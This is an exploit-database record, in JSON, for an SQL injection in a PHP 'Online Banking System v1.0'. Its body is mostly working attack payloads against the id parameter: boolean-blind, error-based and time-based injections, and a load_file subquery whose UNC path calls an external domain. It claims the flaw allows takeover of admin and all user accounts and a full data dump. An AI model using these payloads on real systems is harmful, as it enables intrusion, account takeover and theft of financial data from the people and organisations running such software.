{"id": "1337DAY-ID-37528", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Online Banking System v1.0 SQL injection Vulnerability", "description": "", "published": "2022-03-28T00:00:00", "modified": "2022-03-28T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/37528", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-03-28T09:44:18", "viewCount": 94, "enchantments": {"vulnersScore": "PENDING"}, "_state": {}, "_internal": {}, "sourceHref": "https://0day.today/exploit/37528", "sourceData": "## Title: Online Banking System v1.0 SQLi \n## Author: nu11secur1ty\n## Vendor: https://www.sourcecodester.com/users/tips23\n## Software: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html\n## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Banking-System\n\n## Description:\nThe id parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\\\\\nf6v7f8u0moiaudh9ebxwywdt4zxnqbhe55svgk.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html\\\\crc'))+' was submitted in the id parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. \nThe application interacted with that domain, indicating that the injected SQL query was executed.\nThe attacker can take administrator account control and also of all accounts on this system, also the malicious user can download all information about this system.\n\nStatus: CRITICAL\n\n[+] Payloads:\n\n```mysql\n\n---\nParameter: id (GET)\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: id=3' AND 4573=4573-- ZCvc&p=view_accouncement\n\n Type: error-based\n Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)\n Payload: id=3' AND (SELECT 9948 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(9948=9948,1))),0x7162787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nCRY&p=view_accouncement\n\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: id=3' AND (SELECT 7546 FROM (SELECT(SLEEP(5)))WNiD)-- MTfV&p=view_accouncement\n---\n\n```\n\n## Reproduce:\n[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Banking-System)\n\n## Proof and Exploit:\n[href](https://streamable.com/3gw6aw)\n", "category": "web applications", "verified": true}